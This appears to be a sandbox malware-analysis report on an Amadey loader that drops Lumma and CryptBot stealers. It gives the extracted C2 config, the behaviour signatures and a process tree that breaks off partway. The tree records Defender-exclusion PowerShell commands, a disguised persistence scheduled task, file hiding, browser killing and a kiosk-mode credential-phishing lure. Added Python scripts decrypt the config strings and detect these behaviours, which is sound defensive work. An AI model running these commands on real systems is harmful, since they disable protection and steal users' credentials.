Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    20-12-2024 04:46

General

  • Target

    a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe

  • Size

    2.9MB

  • MD5

    cd7686b11754d77b8722880a1a3a9a43

  • SHA1

    ea1c00d2985812539452a31d8f75506573dad692

  • SHA256

    a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944

  • SHA512

    64d095a52c5a9987cbdbe00c95cd96db67d5bf9faa9a53c1132eab27be7d0d8b7adf209195db8b925c6453ada759165ecfc8c1a5ac4f3ea7d3427fea2b643cab

  • SSDEEP

    49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

  • rc4.plain

    1: 006700e5a2ab05704bbb0c589b88924d
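
Triage reports the RC4 key (`rc4.plain`) next to the rest of the Amadey config. The script below is an added example, not code from the sample, from Triage, or from Amadey's authors: it shows how such a key would be applied to recover encrypted strings. Two things are assumptions of this example rather than facts from the report: that the key is used as its ASCII bytes, and that encrypted strings are stored hex-encoded. The blobs it decrypts are constructed here by encrypting values from the config above; nothing is pulled from the binary.

```python
"""Apply the `rc4.plain` key from the extracted Amadey config to hex-encoded RC4 strings.

Added example, not code from the sample or from Triage. Assumptions (this example's, not
the report's): the key is used as its raw ASCII bytes and strings are stored as hex text.
"""
from __future__ import annotations

RC4_KEY = b"006700e5a2ab05704bbb0c589b88924d"  # rc4.plain value from the config above


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). Encrypting and decrypting are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation, XOR with keystream
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_hex_string(hex_blob: str, key: bytes = RC4_KEY) -> str:
    """Hex-decode a stored string and RC4-decrypt it (plaintext assumed to be UTF-8)."""
    return rc4(key, bytes.fromhex(hex_blob)).decode("utf-8")


def encrypt_to_hex(plaintext: str, key: bytes = RC4_KEY) -> str:
    """Inverse of decrypt_hex_string; used here only to build constructed test blobs."""
    return rc4(key, plaintext.encode("utf-8")).hex()


# Constructed blobs: values from the extracted config, encrypted by this script.
# A practitioner would replace these with hex strings carved out of the unpacked binary.
CONSTRUCTED_BLOBS = {name: encrypt_to_hex(value) for name, value in {
    "c2": "http://185.215.113.43",
    "url_path": "/Zu7JuNko/index.php",
    "install_file": "skotes.exe",
}.items()}


def decrypt_all(blobs=CONSTRUCTED_BLOBS, key: bytes = RC4_KEY) -> dict[str, str]:
    """Decrypt every blob in a name -> hex mapping."""
    return {name: decrypt_hex_string(blob, key) for name, blob in blobs.items()}


if __name__ == "__main__":
    for name, value in decrypt_all().items():
        print(f"{name:13s} {value}")
```

If the strings in a real Amadey build do not decrypt to readable text with this routine, the key derivation or encoding differs from the assumptions stated above; the RC4 core itself is standard and can be checked against the usual "Key"/"Plaintext" test vector.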

Extracted

Family

lumma

Extracted

Family

cryptbot

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer, widely distributed bundled with other software.

  • Cryptbot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 61 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs
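
The signatures above describe behaviours; the process tree below shows the exact command lines that produced them. As an added example (not part of the Triage report, and not code from any of the families listed), the script below turns those behaviours into checks over process-creation telemetry. It runs offline against a handful of constructed Sysmon-style records whose command lines and parent processes are copied from the process tree on this page; the record layout, the rule names and the set of "user-writable" directories are this example's own assumptions.

```python
"""Rules for the behaviours in this report, run over constructed process-creation records.

Added example, not part of the Triage report. Record format, rule names and the
USER_WRITABLE pattern are this example's assumptions; command lines are from the page.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the created process
    cmdline: str    # its command line
    parent: str     # full path of the parent process


# Directories a standard user can write to (assumption: extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData\\(Local|Roaming)|ProgramData|Users\\Public)\\", re.I)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check(ev: ProcEvent) -> list[str]:
    """Return the names of the rules the event trips (empty list means nothing flagged)."""
    hits: list[str] = []
    img, cmd = basename(ev.image), ev.cmdline
    low = cmd.lower()

    # 1. Defender exclusion added from PowerShell (as 7e8e0935c9.exe / e57707a59c.exe do)
    if img == "powershell.exe" and "add-mppreference" in low and "-exclusion" in low:
        hits.append("defender_exclusion_added")

    # 2. Minute-interval scheduled task whose action lives in a user-writable directory
    if img == "schtasks.exe" and "/create" in low:
        m = re.search(r'/tr\s+"?([^"]+?)"?\s+/sc\s+minute', cmd, re.I)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("schtasks_minute_user_writable")

    # 3. attrib hiding an executable under the user profile or ProgramData
    if img == "attrib.exe" and "+h" in low and ".exe" in low and USER_WRITABLE.search(cmd):
        hits.append("attrib_hide_exe")

    # 4. Forced termination of browsers (precedes the kiosk-mode lure below)
    if img == "taskkill.exe" and "/f" in low and any(b in low for b in BROWSERS):
        hits.append("taskkill_browser")

    # 5. Browser started in kiosk mode by a non-browser parent, with a second URL in the query string
    if img in BROWSERS and "--kiosk" in low and basename(ev.parent) not in BROWSERS:
        m = re.search(r"https?://\S+", cmd)
        if m and re.search(r'\?[^ "]*https?://', m.group(0)):
            hits.append("kiosk_browser_lure")

    # 6. Password-protected archive extracted by a 7z.exe that itself lives in a temp/user directory
    if img == "7z.exe" and USER_WRITABLE.search(ev.image) and re.search(r"\s-p\S+", cmd):
        hits.append("7z_password_extract_from_temp")

    # 7. Payload launched from %TEMP%\<10 digits>\<10 hex>.exe by the installed loader (skotes.exe)
    if re.search(r"\\Temp\\\d{10}\\[0-9a-f]{10}\.exe$", ev.image, re.I) and basename(ev.parent) == "skotes.exe":
        hits.append("amadey_loader_payload_launch")

    return hits


# Constructed records: command lines and parents as shown in the process tree on this page.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"',
              r"C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe"),
    ProcEvent(r"C:\Windows\system32\schtasks.exe",
              r'schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE',
              r"C:\Users\Admin\AppData\Local\Temp\main\in.exe"),
    ProcEvent(r"C:\Windows\system32\attrib.exe",
              r"attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe",
              r"C:\Users\Admin\AppData\Local\Temp\main\in.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\taskkill.exe", r"taskkill /F /IM chrome.exe /T",
              r"C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe"),
    ProcEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking',
              r"C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe"),
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\main\7z.exe",
              r"7z.exe e file.zip -p24291711423417250691697322505 -oextracted",
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(r"C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"',
              r"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"),
    # Constructed benign control: an operator's own ping must not fire anything.
    ProcEvent(r"C:\Windows\system32\PING.EXE", r'"C:\Windows\system32\PING.EXE" 8.8.8.8',
              r"C:\Windows\system32\cmd.exe"),
]


def triage(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each flagged event's command line to the rules it trips; clean events are dropped."""
    return {ev.cmdline: hits for ev in events if (hits := check(ev))}


if __name__ == "__main__":
    for cmdline, rules in triage().items():
        print(", ".join(rules), "<-", cmdline)
```

Each rule is deliberately narrow (an exclusion added through PowerShell, a minute-interval task pointing into AppData, a kiosk browser whose URL carries another URL) so that it holds up on a real fleet; the interesting signal in this sample is that all of them fire within one parent chain under skotes.exe, which is the correlation worth alerting on.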

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1216
      • C:\Users\Admin\AppData\Local\Temp\a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe
        "C:\Users\Admin\AppData\Local\Temp\a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2744
          • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
            "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1532
            • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
              "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
              5⤵
              • Executes dropped EXE
              PID:3060
            • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
              "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2684
          • C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe
            "C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:756
          • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
            "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:2112
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:1056
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:1688
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
          • C:\Users\Admin\AppData\Local\Temp\1018210001\4ab1990554.exe
            "C:\Users\Admin\AppData\Local\Temp\1018210001\4ab1990554.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2072
          • C:\Users\Admin\AppData\Local\Temp\1018211001\fb41eb2b6d.exe
            "C:\Users\Admin\AppData\Local\Temp\1018211001\fb41eb2b6d.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2740
          • C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe
            "C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\gzlhd"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:908
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2628
          • C:\Users\Admin\AppData\Local\Temp\1018213001\bb52f2e013.exe
            "C:\Users\Admin\AppData\Local\Temp\1018213001\bb52f2e013.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2976
            • C:\Windows\system32\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
              5⤵
              • Loads dropped DLL
              PID:1664
              • C:\Windows\system32\mode.com
                mode 65,10
                6⤵
                  PID:2376
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:756
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_7.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1492
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_6.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2572
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_5.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2820
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_4.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_3.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2516
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_2.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3048
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_1.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3056
                • C:\Windows\system32\attrib.exe
                  attrib +H "in.exe"
                  6⤵
                  • Views/modifies file attributes
                  PID:536
                • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                  "in.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2656
                  • C:\Windows\system32\attrib.exe
                    attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    7⤵
                    • Views/modifies file attributes
                    PID:1368
                  • C:\Windows\system32\attrib.exe
                    attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    7⤵
                    • Views/modifies file attributes
                    PID:316
                  • C:\Windows\system32\schtasks.exe
                    schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2672
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell ping 127.0.0.1; del in.exe
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:584
                    • C:\Windows\system32\PING.EXE
                      "C:\Windows\system32\PING.EXE" 127.0.0.1
                      8⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:3564
          • C:\Users\Admin\AppData\Local\Temp\1018214001\16d019449f.exe
            "C:\Users\Admin\AppData\Local\Temp\1018214001\16d019449f.exe"
            4⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3212
          • C:\Users\Admin\AppData\Local\Temp\1018215001\3fc6c7cc3a.exe
            "C:\Users\Admin\AppData\Local\Temp\1018215001\3fc6c7cc3a.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:3848
          • C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe
            "C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:4400
            • C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe
              "C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4584
          • C:\Users\Admin\AppData\Local\Temp\1018217001\52d5fcdb6e.exe
            "C:\Users\Admin\AppData\Local\Temp\1018217001\52d5fcdb6e.exe"
            4⤵
            • Executes dropped EXE
            PID:4960
          • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
            "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5308
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              5⤵
              • Executes dropped EXE
              PID:2628
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              5⤵
              • Executes dropped EXE
              PID:2148
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              5⤵
              • Executes dropped EXE
              PID:3036
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              5⤵
              • Executes dropped EXE
              PID:1704
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              5⤵
              • Executes dropped EXE
              PID:1756
          • C:\Users\Admin\AppData\Local\Temp\1018219001\e57707a59c.exe
            "C:\Users\Admin\AppData\Local\Temp\1018219001\e57707a59c.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5544
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\vrudwla"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5708
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5936
          • C:\Users\Admin\AppData\Local\Temp\1018220001\dee2c68b58.exe
            "C:\Users\Admin\AppData\Local\Temp\1018220001\dee2c68b58.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:6444
          • C:\Users\Admin\AppData\Local\Temp\1018221001\718410bf88.exe
            "C:\Users\Admin\AppData\Local\Temp\1018221001\718410bf88.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:7060
          • C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe
            "C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:7616
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:7668
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:7824
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:7936
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:8040
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:8176
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
              PID:8328
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                6⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:8344
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.0.1061018301\1480083165" -parentBuildID 20221007134813 -prefsHandle 1268 -prefMapHandle 1260 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0143e47-2b0d-4e5b-9817-f055db30ca12} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 1368 12d09d58 gpu
                  7⤵
                  PID:8768
                • C:\Program Files\Mozilla Firefox\firefox.exe
